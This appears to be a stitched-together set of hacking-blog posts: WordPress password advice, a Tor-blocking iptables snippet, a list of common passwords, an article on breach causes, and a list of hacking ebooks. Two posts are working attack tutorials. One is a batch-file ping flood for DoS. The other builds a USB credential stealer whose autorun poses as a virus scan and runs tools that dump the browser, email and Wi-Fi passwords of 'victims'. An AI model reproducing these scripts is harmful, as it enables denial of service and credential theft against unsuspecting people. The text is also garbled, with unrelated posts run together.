tv crime2
How Ping of Death attack works?
Not all computers can handle data larger than a fixed size. So, when a ping of death packet is sent from a source computer to a target machine, the ping packet gets fragmented into smaller groups of packets.

One fragment is of 8 octets size. When these packets reach the target computer, they arrive in fragments. So, the target computer reassembles the malformed packets which are received in chunks. But, the whole assembled packet causes buffer overflow at the target computer.

This buffer flow often causes the system crash making the system more vulnerable to attack.

Once the system becomes more vulnerable to attack, it allows more attacks like the injection of a trojan horse on the target machine.

A simple tutorial on how to perform DoS attack using ping of death using CMD:

Disclaimer: This is just for educational purposes. It’s nothing great but you can use it to learn.

Here are the steps:

  • Open Notepad
  • Copy the following text on the notepad

:loop
ping <IP Address> -l 65500 -w 1 -n 1
goto :loop

In the above command, replace <IP Address> with an IP address.

  • Save the Notepad with any name. Let’s say dos.txt
  • Right click on the dos.txt and click on rename.
  • Change the extension from .txt to .bat
  • So, now the file name should be dos.bat
  • Double click on it and you will see a command prompt running with a lot of pings.

tv-wordpress

 

WordPress is the most popular Content Management System (CMS) used to power digital assets of websites and blogs on the Internet.

In fact, about 75 million sites (representing about 26% of all sites) depend on WordPress to make their online presence known.

Because of its increasing popularity, WordPress powered platforms are normally targeted by malicious hacking attacks and other types of security vulnerabilities.

In early 2016, Wordfence, a site providing security plugin for WordPress users, reported over 6 million password attacks  targeting over 72,000 individual sites within a 16-hour period.

And, what’s the most vulnerable point in the security of any WordPress site?

Yes, you are right, it’s the P A S S W O R D.

If an unauthorized person is able to guess, crack, or retrieve your password, then you could be in for a long, very long day.

Currently, with the modern advancement in technology, password-cracking techniques have equally become better. Some passwords could be very easy for a computer to break and strenuous for a person to keep in memory or type.

One of the most advanced password cracking tools can attempt up to 350 billion password guesses every second.

So, creating unbreakable passwords is key to maintaining the security of your blog.

Here are some useful tips.

  1. Keep away from the world’s worst passwords

In the current digital age, having a password to access your online accounts is simply indispensable.

SplashData, which focuses on making password management software, compiled a list of commonly used passwords among Internet users. The company analyzed the data from more than 2 million passwords retrieved in 2015.

If this list contains the password or its related combinations you use for accessing your WordPress site, then move swiftly to a more secure one.

Here is a list of the 25 commonly used passwords:

Keep away from the world’s worst passwords

  1. Use a unique and creative password for your WordPress site

Do not make the fatal mistake of using the same password for your email account, social media accounts, and other places for accessing your WordPress website or blog.

Regurgitating your passwords is a risky affair you should avoid as plague. In case a malicious hacker discovers the password you use for one account, he or she could simply make your online life unbearable.

Desist from using names of places and dictionary words in your passwords. Currently, the methods of cracking passwords have advanced such that hackers are able to “brute force“; that is, try out different dictionary words and other common phrases to break the passwords.

Furthermore, to be unique, you can avoid using a password that’s related to your WordPress site and use a creative mixture of upper case and lower case letters, numbers, and symbols. This way, you will be making the work of someone trying to guess your password hard.

For instance, you can choose a random word or phrase and insert letters and numbers throughout it to increase complexity (such as “uTo7pyr$ll0%w4Ge”).

To make such complex passwords easier to remember but difficult for others to guess, you can take a sentence and convert it into a password by abbreviating words and creatively adding other memorable components.

For example, “I and my wife went for a holiday to Singapore for $3,500” could be “Iamww4@h2S4$35”. And, “Woohoo! I Blog Seven times a Week for money and fun” could translate to something like “WOO!IbG7#aWk4$+f”.

Here is how you can substitute some of the alphabets:

A= @

I= 1

L=!

o= 0 (zero)

S=$

Z= 2

Better still, you can use convenience software like LastPass and 1Password for remembering your strong, complex passwords.

As earlier mentioned here at Legit Blogger, avoid using commonly used words or sequential patterns that make the work of hackers easy.

The reason why “1qaz2wsx” made it to the list of the 25 worst passwords of 2015 (though it seems to be strong) is because it’s based on a sequential pattern of the initial two column keys on a standard computer keyboard.

So, better be safe than sorry and inject uniqueness and some creativity into your passwords.

  1. Do not fall prey of “phishing” attacks

If you receive an email from your hosting company or another source prompting you to change the login details of your cPanel, update the login details of your site, or provide other sensitive information, be careful before responding to such a message.

Before clicking on any links, ensure that the source is legitimate or you may fall a victim of a “phishing” attack.

If you provide your password details to a malicious website, a hacker could get hold of the information and make you curse, instead of blessing, your blogging life.

  1. Consider using WordPress security plugins

It prevents WordPress users with administrative access privileges from entering weak passwords. With this innovative plugin, a user can only publish posts, upload files, or edit posts only with a strong verified password.

These plugins will incorporate an additional layer of security to your WordPress blog by using a combination of two separate security credentials, for example, sending you a unique code to your mobile phone each time you want to log into your site, in addition to requiring you to enter your usual log in details.

As the name suggests, this innovative plugin will restrict the number of times a user can enter a password to gain access to a site. Therefore, someone trying to use a brute force attack to compromise your site has fewer chances.

With this powerful plugin, your WordPress site will be protected from malicious attacks by giving you frequent security updates, enforcing strong passwords, and accomplishing several other things.

  1. Length of password is key

The longer the password, the more secure it becomes in protecting your digital assets from malicious intrusions. It’s recommended to have passwords of at least 8 characters long. A good way to have longer passwords is to use passphrases.

Passphrases are just like passwords apart from being constructed from an unsystematic mixture of words, instead of just a single word. For example, press demonstrate blog million.

To create a passphrase, simply select a list of random numbers or use the free password creator tool. Thereafter, you can add some extra layer of robustness by a mixture of symbols, upper case letters, and lower case letters. Remember to avoid placing words in an easily predictable pattern and including easily identifiable phrases.

Furthermore, to have longer and stronger passwords, you can consider using a password manager. With such an application, you can safely create strong, lengthy passwords, which are kept in a secure database.

You can use a single passphrase to access the password manager; thereafter, the application will automatically enter your details on the login page of your WordPress site.

Because of the innovative capabilities of the password managers, it will not be necessary to remember your lengthy passwords every time you want to login into your site.

Click here for a list of the best passwords managers you can consider using.

  1. Keep your backup password options secure and up-to-date

Since WordPress.com uses your email address as the primary means of identification, you need to ensure that you frequently update your recovery email address.

Failure to keep the details of your email address up-to-date and secure could make an attacker to easily reset your passwords and login to your WordPress site.

Most free email service providers, such as Gmail and Yahoo mail, have a multi-factor authentication process.

When you enable this feature on your email account, you will be required to enter a short code sent to your mobile device and answer a series of security questions before accessing your account from an unrecognized device.

This way, the possibility of your account going into the wrong hands is greatly reduced.

  1. Be proactive
  • After creating a password, check its strength using this free tool. If it’s weak, you may continue modifying it until you get something solid.
  • Change your WordPress login details as frequently as possible. Using “Admin” as username and the name of your site as the password without frequently making improvements could land you into the land controlled by hackers.
  • Do not dish your passwords to anyone, even your “close” friends. You may never know how much they are concerned about the security of your site.
  • If you have to send your passwords through email, use a secure method of transmission such as com and select the password expiry time. If you send naked passwords through emails, which are rarely encrypted, the bad guys could get old of them.
  • When on a public computer, avoid saving your passwords or using the “Remember Me” feature, Further, watch out for people trying to look at your screen over your shoulder and remember to log out or close down your computer after you have finished your work.

Conclusion

Having your site compromised by an attacker is a horror that few webmasters are prepared to endure. Ensuring that your site is up and running normally after a successful attack requires thick skin, patience, and money.

Nonetheless, security issues are vital for the optimal performance of any WordPress website or blog. Therefore, instituting ample security measures beforehand is normally better than tackling the aftermath.

Fortunately, the robust WordPress platform, which is trusted by a large number of site owners, is generally very safe. And, one of the vital ways of keeping a WordPress site free from attackers is by vigilantly using strong and secure passwords.

tv crime2Internet trolls are using Tor nowadays to avoid bans by IP. However, banning Tor exit nodes is just slightly more complex. The Tor Project provides a regularly updated list of exit nodes that can access your IP here. As there may be many hundreds or even thousands of nodes, adding them to iptables can hurt your server’s network performance. Enter ipset, a user-space hash table for iptables:

# create a new set for individual IP addresses
ipset -N tor iphash
# get a list of Tor exit nodes that can access $YOUR_IP, skip the comments and read line by line
wget -q https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip=$YOUR_IP -O -|sed '/^#/d' |while read IP
do
  # add each IP address to the new set, silencing the warnings for IPs that have already been added
  ipset -q -A tor $IP
done
# filter our new set in iptables
iptables -A INPUT -m set --match-set tor src -j DROP

tv crime2From the moment people started using passwords, it didn’t take long to realize how many people picked the very same passwords over and over. Even the way people misspell words is consistent. In fact, people are so predictable that most hackers make use of lists of common passwords just like these. To give you some insight into how predictable humans are, the following is a list of the 500 most common passwords. If you see your password on this list, please change it immediately. Keep in mind that every password listed here has been used by at least hundreds if not thousands of other people.

There are some interesting passwords on this list that show how people try to be clever, but even human cleverness is predictable. For example, look at these passwords that I found interesting:

ncc1701 The ship number for the Starship Enterprise
thx1138 The name of George Lucas’s first movie, a 1971 remake of an earlier student project
qazwsx Follows a simple pattern when typed on a typical keyboard
666666 Six sixes
7777777 Seven sevens
ou812 The title of a 1988 Van Halen album
8675309 The number mentioned in the 1982 Tommy Tutone song. The song supposedly caused an epidemic of people dialing 867- 5309 and asking for “Jenny”

“…Approximately one out of every nine people uses at least one password on the list shown in table below. One out of every 50 people uses one of the top 20 worst passwords..”

Lists the top 500 worst passwords of all time, not considering character case. Don’t blame me for the offensive words; you were the ones who picked these, not me.

NO Top 1-100 Top 101–200 Top 201–300 Top 301–400 Top 401–500
1 123456 porsche firebird prince rosebud
2 password guitar butter beach jaguar
3 12345678 chelsea united amateur great
4 1234 black turtle 7777777 cool
5 pussy diamond steelers muffin cooper
6 12345 nascar tiffany redsox 1313
7 dragon jackson zxcvbn star scorpio
8 qwerty cameron tomcat testing mountain
9 696969 654321 golf shannon madison
10 mustang computer bond007 murphy 987654
11 letmein amanda bear frank brazil
12 baseball wizard tiger hannah lauren
13 master xxxxxxxx doctor dave japan
14 michael money gateway eagle1 naked
15 football phoenix gators 11111 squirt
16 shadow mickey angel mother stars
17 monkey bailey junior nathan apple
18 abc123 knight thx1138 raiders alexis
19 pass iceman porno steve aaaa
20 fuckme tigers badboy forever bonnie
21 6969 purple debbie angela peaches
22 jordan andrea spider viper jasmine
23 harley horny melissa ou812 kevin
24 ranger dakota booger jake matt
25 iwantu aaaaaa 1212 lovers qwertyui
26 jennifer player flyers suckit danielle
27 hunter sunshine fish gregory beaver
28 fuck morgan porn buddy 4321
29 2000 starwars matrix whatever 4128
30 test boomer teens young runner
31 batman cowboys scooby nicholas swimming
32 trustno1 edward jason lucky dolphin
33 thomas charles walter helpme gordon
34 tigger girls cumshot jackie casper
35 robert booboo boston monica stupid
36 access coffee braves midnight shit
37 love xxxxxx yankee college saturn
38 buster bulldog lover baby gemini
39 1234567 ncc1701 barney cunt apples
40 soccer rabbit victor brian august
41 hockey peanut tucker mark 3333
42 killer john princess startrek canada
43 george johnny mercedes sierra blazer
44 sexy gandalf 5150 leather cumming
45 andrew spanky doggie 232323 hunting
46 charlie winter zzzzzz 4444 kitty
47 superman brandy gunner beavis rainbow
48 asshole compaq horney bigcock 112233
49 fuckyou carlos bubba happy arthur
50 dallas tennis 2112 sophie cream
51 jessica james fred ladies calvin
52 panties mike johnson naughty shaved
53 pepper brandon xxxxx giants surfer
54 1111 fender tits booty samson
55 austin anthony member blonde kelly
56 william blowme boobs fucked paul
57 daniel ferrari donald golden mine
58 golfer cookie bigdaddy 0 king
59 summer chicken bronco fire racing
60 heather maverick penis sandra 5555
61 hammer chicago voyager pookie eagle
62 yankees joseph rangers packers hentai
63 joshua diablo birdie einstein newyork
64 maggie sexsex trouble dolphins little
65 biteme hardcore white 0 redwings
66 enter 666666 topgun chevy smith
67 ashley willie bigtits winston sticky
68 thunder welcome bitches warrior cocacola
69 cowboy chris green sammy animal
70 silver panther super slut broncos
71 richard yamaha qazwsx 8675309 private
72 fucker justin magic zxcvbnm skippy
73 orange banana lakers nipples marvin
74 merlin driver rachel power blondes
75 michelle marine slayer victoria enjoy
76 corvette angels scott asdfgh girl
77 bigdog fishing 2222 vagina apollo
78 cheese david asdf toyota parker
79 matthew maddog video travis qwert
80 121212 hooters london hotdog time
81 patrick wilson 7777 paris sydney
82 martin butthead marlboro rock women
83 freedom dennis srinivas xxxx voodoo
84 ginger fucking internet extreme magnum
85 blowjob captain action redskins juice
86 nicole bigdick carter erotic abgrtyu
87 sparky chester jasper dirty 777777
88 yellow smokey monster ford dreams
89 camaro xavier teresa freddy maxwell
90 secret steven jeremy arsenal music
91 dick viking 11111111 access14 rush2112
92 falcon snoopy bill wolf russia
93 taylor blue crystal nipple scorpion
94 111111 eagles peter iloveyou rebecca
95 131313 winner pussies alex tester
96 123123 samantha cock florida mistress
97 bitch house beer eric phantom
98 hello miller rocket legend billy
99 scooter flower theman movie 6666
100 please jack oliver success albert

tv crime2Security breaches, also known as a safety violation, occur when a person or application illegally enters a confidential IT border. This could result in the hacking of unauthorized data, services, networks and applications that are highly critical.

Breaches can also cause bankruptcy and destroy a company’s reputation, which is why most businesses hire an IT solutions company. However, not all security breaches are intentional; mistakes can trigger a security violation, as well, and without any warning.

Here are five innocent mistakes that lead to an IT security breach.

DEVICE THEFT OR LOSS

A lost or stolen device like a smartphone or laptop causes 3.3 percent of confirmed security breaches and 15.3 percent of overall incidents.

People who forget their devices in a public place or vehicle have higher chances of losing their gadgets because of theft. Most of these cases are opportunistic and involve a huge number of public departments.

When the thief takes advantage of the device, he can access the person’s confidential images, videos, documents and business files without IT security measures in place.

DOCUMENT ERRORS

Document-related errors are some of the common causes of a data breach. A few examples of these include forwarding sensitive information to incorrect recipients, publishing private data to public web servers, and carelessly disposing of confidential work data.

These events usually occur internally and accidentally. When this happens, hackers can use the stolen information as blackmail or as an asset to their group. They can also access bank accounts and other documents related to finance.

WEAK AND STOLEN CREDENTIALS

Hacking is the biggest cause of security attacks, which is primarily instigated by weak passwords and stolen credentials. Employees who have access to password-protected files and applications should take caution when unlocking these documents, especially when the company asset contains confidential information.

If you are working on a public computer, avoid clicking on the “remember password” option, so that intruders won’t have the opportunity to access private accounts if your computer gets hacked.

Additionally, you should never leave your password in an open computer file or even written on a sticky note affixed to your desktop, as this can be used by an external actor like a service person to access the organization’s intranet.

At the same time, it is important that you create a strong, non-obvious password that includes numbers, symbols, and capital and lower-case letters. One of the most effective techniques is the Bruce Schneier Method, which takes a sentence and turns it into a strong password.

There are also password-generating sites and password managers that throw out efficient and strong passwords.

INTERNET SPYWARE

Did you know that over 50% of security breaches are caused by employees misusing access privileges? Whether maliciously or unwittingly, employees who naively click pop-up browsers or install a malicious application can welcome spyware on a company’s system.

Spyware is a type of malware that enters a computer without the knowledge of the owner to collect private information about internet interaction, keylogging, passwords and valuable data. Spyware can either be on a file you downloaded online or a malicious hard drive inserted on your desktop. This can also be found in unauthorized web searches and varying computer settings.

The risk of a security breach is very high with spyware but you can prevent this by generating a virus scanner and avoiding malicious websites and illegal downloads at work. Companies should also take the first step by implementing a spy trap, which is basically a filter for all work systems.

VULNERABLE SYSTEMS AND APPLICATIONS

Using outdated software and web browsers can cause serious security concerns. Attack methods become more advanced each year, and hackers increase the number of ways that they can violate vulnerabilities like these.

When outdated systems regularly connect to the internet, they can submit valuable information online without the user knowing it.

You can prevent security breaches by taking note of these basic pointers.

  • Take care of your personal data, especially when on the road. Every time you bring your data on the go, you are opening yourself to a multitude of security risks. For example, when you access public Wi-Fi, you disseminate your information to the immediate public and to hackers who use meticulous processes to breach data. Avoid this by investing in a personal hotspot or by subscribing to your provider’s mobile data services.
  • Create strong passwords. Never create a password that contains basic personal information like your surname or birthday. Hackers can easily identify this and use it in your work and personal accounts. A strong password should be a combination of characters, numbers, and symbols. Apart from this, don’t use one password for every account you own. Although it may be easy to remember, it’s also easy to hack.
  • Be careful of file sharing. You share a number of important files every time you work with multiple clients. No matter how much you trust a colleague, you never know where he will use the data you shared. To prevent malicious use of relevant documents, make sure that the files you share with your clients are only for work purposes. If you share documents through a cloud, immediately delete the final ones after use.

The number of security breaches increases every year, but there are plenty ways to protect yourself and your company from this. Keeping your data secured is the most efficient way to prevent damaging security breaches.

tv crime2In this era of corporate hacking, stealing personal details and putting them on sites such as Pastebin here is an easy way to backup or steal passwords.
Requirements –

1. A PC
2. USB drive
3. Internet Connection ( for downloading file )

Before going to start I’ve listed some tools that will help you in this article. Which you can easily get it here www.nirsoft.net/

ChromePass – ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser

Password Fox – PasswordFox is a small
password recovery tool for Windows that allows you to view the user names and passwords stored by Mozilla Firefox Web browser.

Mail PassView -Recovers the passwords of the email programs( i.e gmail,yahoo,Outllok Express etc).

WebBrowser PassView –  WebBrowser PassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 – 8.0), Mozilla Firefox (All Versions), Google Chrome and Opera. This tool can be used to recover your lost/forgotten password of any Website, including popular Web sites, like Facebook, Yahoo, Google, and GMail, as long as the password is stored by your Web Browser. After
retrieving your lost passwords, you can save them into text/html/csv/xml file, by using the ‘Save Selected Items’ option (Ctrl+S).

WirelessKeyView:-WirelessKeyView recovers all wireless network keys (WEP/WPA) stored in your computer

Steps

1. Extract the files you downloaded to your desktop and copy all the .exe files to your USB

2. Create a new file in Notepad and write the following text into it –

[autorun] open=run.bat
ACTION= Scan your device for virus

Save the Notepad as autorun.inf
Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following code on it.

start ChromePass.exe /stext ChromePass.txt
start mailpv.exe /stext mailpv.txt
start WebBrowserPassView.exe /
stext WebBrowserPassView.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start PasswordFox.exe /stext passwordfox.txt

save the notepad file as “run.bat”.
Copy the run.bat file also to your USB drive.

Now your USB password stealer is ready. Insert it in your victims computer and then click on the popup Scan your device for virus when you click on it your USB password stealer will do it’s magic and all the passwords saved on the system will be saved in .txt file.

Have a try and feel free to paste the results in the comments section below.

 

tv - programer

Free hacking ebooks where you can download from the links below.

  1. Black Belt Hacking & Complete Hacking Book
  2. Hackers High School 13 Complete Hacking E-books
  3. Penentration Testing With Backtrack 5
  4. A Beginners Guide To Hacking Computer Systems
  5. Black Book of Viruses and Hacking
  6. Secrets of Super and Professional Hackers
  7. Dangerours Google Hacking Database and Attacks
  8. Internet Advanced Denial of Service (DDOS) Attack
  9. Computer Hacking & Malware Attacks for Dummies
  10. G-mail Advance Hacking Guides and Tutorials
  11. Vulnerability Exploit & website Hacking for Dummies
  12. Web App Hacking (Hackers Handbook)
  13. Security Crypting Networks and Hacking
  14. Botnets The Killer Web Applications Hacking
  15. Hacking attacks and Examples Test
  16. Network Hacking and Shadows Hacking Attacks
  17. Gray Hat Hacking and Complete Guide to Hacking
  18. Advance Hacking Exposed Tutorials
  19. 501 Website Hacking Secrets
  20. Internet Security Technology and Hacking
  21. CEH Certified Ethical Hacker Study Guide
  22. Advanced SQL Injection Hacking and Guide
  23. Web Hacking & Penetration testing
  24. OWASP Hacking Tutorials and Web App Protection
  25. CEH – Hacking Database Secrets and Exploit
  26. Ethical Hacking Value and Penetration testing
  27. Hack any Website, Complete Web App Hacking
  28. Beginners Hackers and tutorials 
  29. Ethical Hacking Complete E-book for Beginners
  30. Backtrack : Advance Hacking tutorials
  31. SQL Injection attacks and tutorials by Exploit DB
  32. XSS + Vulnerability Exploitation & Website Hacking
  33. Ultimate Guide to Social Enginnering attacks
  34. White Hat Hacking complete guide to XSS Attacks 
  35. Cross Site Scripting and Hacking Websites 
  36. The Hackers Underground Handbook ( hack the system)
  37. Blind SQL Injection tutorials and Hacking
  38. Hacking Secrets Revealed
  39. Hacking Website Database and owning systems
  40. Reverse Engineering for Beginners 
  41. Reverse Enginnering (The Real Hacking)
  42. Computer Hacking
  43. Hack your Friend using Backtrack
  44. Reverse Enginnering Hacking and Cracking
  45. Hack the System for beginners
  46. Hacking into Computer Systems
  47. Blind SQL Injection Discovery & Exploitation
  48. CEH v8

Note : These best hacking e-books are only for the ethical knowledge purpose and must not be used for illegal purposes.